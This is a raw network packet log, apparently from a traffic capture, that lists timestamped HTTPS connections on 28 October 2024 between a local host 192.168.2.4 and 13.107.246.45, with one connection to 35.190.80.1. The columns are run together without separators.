                                                                            Oct 28, 2024 09:37:16.559217930 CET4434989113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:16.559299946 CET49891443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:16.559426069 CET49891443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:16.559439898 CET4434989113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:16.641118050 CET4434988313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:16.641222954 CET4434988313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:16.641334057 CET49883443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:16.641674042 CET49883443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:16.641690969 CET4434988313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:16.647548914 CET49892443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:16.647641897 CET4434989213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:16.647774935 CET49892443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:16.647977114 CET49892443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:16.648010015 CET4434989213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.147531033 CET4434988813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.167877913 CET49888443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.167937040 CET4434988813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.168831110 CET49888443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.168844938 CET4434988813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.292386055 CET4434989113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.292521000 CET4434988813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.292593002 CET4434988813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.292674065 CET49888443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.292732000 CET4434988813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.292768002 CET4434988813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.292830944 CET49888443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.293690920 CET4434988913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.298747063 CET4434989013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.310590029 CET49890443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.310667992 CET4434989013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.312020063 CET49890443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.312072992 CET4434989013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.312822104 CET49891443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.312899113 CET4434989113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.313992977 CET49891443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.314007044 CET4434989113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.314363956 CET49888443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.314363956 CET49888443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.314407110 CET4434988813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.314433098 CET4434988813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.317987919 CET49889443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.318005085 CET4434988913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.318394899 CET49889443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.318406105 CET4434988913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.321007013 CET49893443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.321065903 CET4434989313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.321126938 CET49893443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.321871042 CET49893443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.321888924 CET4434989313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.379170895 CET4434989213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.379873037 CET49892443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.379950047 CET4434989213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.381011009 CET49892443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.381062031 CET4434989213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.439590931 CET4434989013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.439728022 CET4434989013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.439795017 CET4434989113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.439851999 CET4434989113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.440007925 CET4434989113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.440016031 CET49890443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.440098047 CET49891443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.440098047 CET49891443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.440188885 CET49891443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.440232038 CET4434989113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.440263987 CET49891443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.440279961 CET4434989113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.443284035 CET49890443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.443367004 CET4434989013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.443411112 CET49890443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.443428993 CET4434989013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.448226929 CET49894443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.448353052 CET4434989413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.448456049 CET49894443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.448920012 CET49894443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.448988914 CET4434989413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.450071096 CET4434988913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.450225115 CET4434988913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.450301886 CET49889443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.450422049 CET49895443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.450426102 CET49889443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.450443983 CET4434989513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.450464964 CET4434988913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.450495005 CET49895443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.456373930 CET49895443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.456387997 CET4434989513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.456384897 CET49896443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.456465960 CET4434989613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.456554890 CET49896443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.457120895 CET49896443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.457199097 CET4434989613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.512620926 CET4434989213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.512646914 CET4434989213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.512712955 CET49892443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.512772083 CET4434989213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.512814999 CET4434989213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.512837887 CET49892443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.512866974 CET49892443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.512923956 CET49892443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.512923956 CET49892443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.512954950 CET4434989213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.512976885 CET4434989213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.514920950 CET49897443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.514966011 CET4434989713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:17.515022993 CET49897443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.515144110 CET49897443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:17.515156984 CET4434989713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.061348915 CET4434989313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.062005043 CET49893443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.062036991 CET4434989313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.062525988 CET49893443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.062532902 CET4434989313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.184442043 CET4434989513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.184926033 CET49895443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.184959888 CET4434989513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.185384035 CET49895443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.185389996 CET4434989513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.190938950 CET4434989613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.191344976 CET49896443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.191420078 CET4434989613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.191478968 CET4434989313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.191530943 CET4434989313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.191586971 CET49893443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.191598892 CET4434989313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.191644907 CET4434989313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.191695929 CET49896443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.191709042 CET4434989613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.191729069 CET49893443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.191962004 CET49893443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.191979885 CET4434989313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.191992044 CET49893443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.191998005 CET4434989313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.194801092 CET49898443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.194859982 CET4434989813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.195126057 CET49898443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.195328951 CET49898443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.195358038 CET4434989813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.222002983 CET4434989413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.222419977 CET49894443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.222479105 CET4434989413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.222771883 CET49894443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.222785950 CET4434989413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.264560938 CET4434989713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.265064001 CET49897443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.265100002 CET4434989713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.265552998 CET49897443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.265558958 CET4434989713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.312794924 CET4434989513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.312936068 CET4434989513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.313013077 CET49895443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.313194990 CET49895443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.313214064 CET4434989513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.313222885 CET49895443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.313227892 CET4434989513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.320558071 CET4434989613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.320702076 CET4434989613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.320792913 CET49896443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.321398973 CET49899443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.321435928 CET4434989913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.321497917 CET49899443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.321964979 CET49896443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.321985960 CET4434989613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.322031021 CET49896443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.322040081 CET4434989613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.322211981 CET49899443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.322230101 CET4434989913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.324219942 CET49900443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.324278116 CET4434990013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.324440956 CET49900443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.324567080 CET49900443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.324584961 CET4434990013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.357412100 CET4434989413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.357559919 CET4434989413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.357698917 CET49894443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.357762098 CET49894443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.357762098 CET49894443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.357794046 CET4434989413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.357822895 CET4434989413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.359719992 CET49901443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.359751940 CET4434990113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.359872103 CET49901443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.359927893 CET49901443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.359954119 CET4434990113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.396894932 CET4434989713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.397038937 CET4434989713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.397120953 CET49897443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.397156000 CET49897443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.397169113 CET4434989713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.397181034 CET49897443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.397186995 CET4434989713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.399069071 CET49902443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.399115086 CET4434990213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:18.399193048 CET49902443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.399364948 CET49902443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:18.399388075 CET4434990213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.063007116 CET4434990013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.063498974 CET49900443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.063541889 CET4434990013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.063961983 CET49900443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.063975096 CET4434990013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.064604998 CET4434989913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.064918995 CET49899443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.064944029 CET4434989913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.065257072 CET49899443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.065264940 CET4434989913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.095707893 CET4434990113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.096031904 CET49901443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.096052885 CET4434990113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.096359968 CET49901443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.096364975 CET4434990113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.122565985 CET4434990213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.122920036 CET49902443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.122998953 CET4434990213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.123279095 CET49902443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.123292923 CET4434990213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.192327976 CET4434990013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.192480087 CET4434990013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.192545891 CET49900443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.192599058 CET49900443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.192627907 CET4434990013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.192652941 CET49900443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.192667961 CET4434990013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.194981098 CET49903443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.195007086 CET4434990313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.195241928 CET49903443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.195306063 CET49903443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.195310116 CET4434990313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.199742079 CET4434989913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.199903011 CET4434989913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.200087070 CET49899443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.200122118 CET49899443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.200123072 CET49899443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.200139999 CET4434989913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.200150013 CET4434989913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.201965094 CET49904443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.201987982 CET4434990413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.202157021 CET49904443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.202291965 CET49904443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.202307940 CET4434990413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.226887941 CET4434990113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.227051973 CET4434990113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.227166891 CET49901443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.227166891 CET49901443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.227166891 CET49901443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.229197979 CET49905443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.229228020 CET4434990513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.229293108 CET49905443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.229417086 CET49905443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.229434013 CET4434990513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.249571085 CET4434990213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.249705076 CET4434990213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.249794960 CET49902443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.249871016 CET49902443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.249871969 CET49902443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.249901056 CET4434990213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.249927044 CET4434990213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.251795053 CET49906443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.251812935 CET4434990613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.251924038 CET49906443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.252047062 CET49906443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.252068996 CET4434990613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.533433914 CET49901443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:19.533457994 CET4434990113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:19.637337923 CET49907443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:19.637382984 CET4434990735.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:19.637444019 CET49907443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:19.637665033 CET49907443192.168.2.435.190.80.1
                                                                            Oct 28, 2024 09:37:19.637674093 CET4434990735.190.80.1192.168.2.4
                                                                            Oct 28, 2024 09:37:20.042345047 CET4434990613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.042754889 CET49906443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.042793036 CET4434990613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.043319941 CET49906443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.043338060 CET4434990613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.044574976 CET4434990413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.044959068 CET49904443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.044969082 CET4434990413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.045633078 CET4434990313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.045639038 CET49904443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.045644999 CET4434990413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.045919895 CET49903443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.045937061 CET4434990313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.046328068 CET49903443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.046334982 CET4434990313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.048768044 CET4434990513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.049206972 CET49905443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.049209118 CET4434989813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.049247980 CET4434990513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.049691916 CET49905443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.049700022 CET4434990513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.050009966 CET49898443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.050019979 CET4434989813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.050548077 CET49898443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.050554037 CET4434989813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.173599005 CET4434990413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.173691988 CET4434990413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.173813105 CET4434990413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.173834085 CET49904443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.173870087 CET49904443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.173959970 CET49904443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.173985004 CET4434990413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.174000978 CET49904443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.174006939 CET4434990413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.174711943 CET4434990613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.174740076 CET4434990613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.174782038 CET4434990613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.174824953 CET49906443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.174943924 CET49906443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.174949884 CET4434990613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.175029039 CET49906443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.175033092 CET4434990613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.175724030 CET4434990313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.175900936 CET4434990313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.175971985 CET49903443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.176424026 CET49903443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.176424026 CET49903443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.176440001 CET4434990313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.176450014 CET4434990313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.177464008 CET49908443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.177483082 CET4434990813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.177567959 CET49908443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.178132057 CET49909443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.178215027 CET4434990913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.178232908 CET49908443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.178232908 CET49910443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.178246975 CET4434990813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.178256035 CET4434991013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.178313017 CET49909443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.178323984 CET49910443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.178419113 CET49909443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.178442001 CET4434990913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.178453922 CET49910443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.178459883 CET4434991013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.181683064 CET4434990513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.181869984 CET4434990513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:20.181946039 CET49905443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.182008982 CET49905443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:20.182035923 CET4434990513.107.246.45192.168.2.4
